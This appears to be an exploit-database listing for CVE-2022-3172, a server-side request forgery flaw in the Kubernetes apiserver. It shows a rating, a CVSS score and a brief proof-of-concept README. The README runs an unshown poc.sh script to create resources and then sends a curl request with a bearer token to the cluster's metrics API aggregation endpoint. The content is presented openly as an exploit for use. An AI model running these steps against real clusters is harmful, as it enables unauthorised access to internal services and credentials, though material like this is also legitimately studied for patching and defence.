Exploit for Server-Side Request Forgery in Kubernetes Apiserver CVE-2022-3172

Name: Exploit for Server-Side Request Forgery in Kubernetes Apiserver CVE-2022-3172
Rating: 5 (129 reviews)

2024-04-02 | CVSS 5.8

## https://sploitus.com/exploit?id=8E88A5EF-E49F-5B1F-A4DF-65C789B3200B
# CVE-2022-3172 demo
## Run poc.sh create resources
```
chmod +x poc.sh
./poc.sh
```
## Use Curl
```
curl https://kubernetes.default.svc/apis/metrics.k8s.io/v2beta1/ -k -H "Authorization: Bearer {token}"
```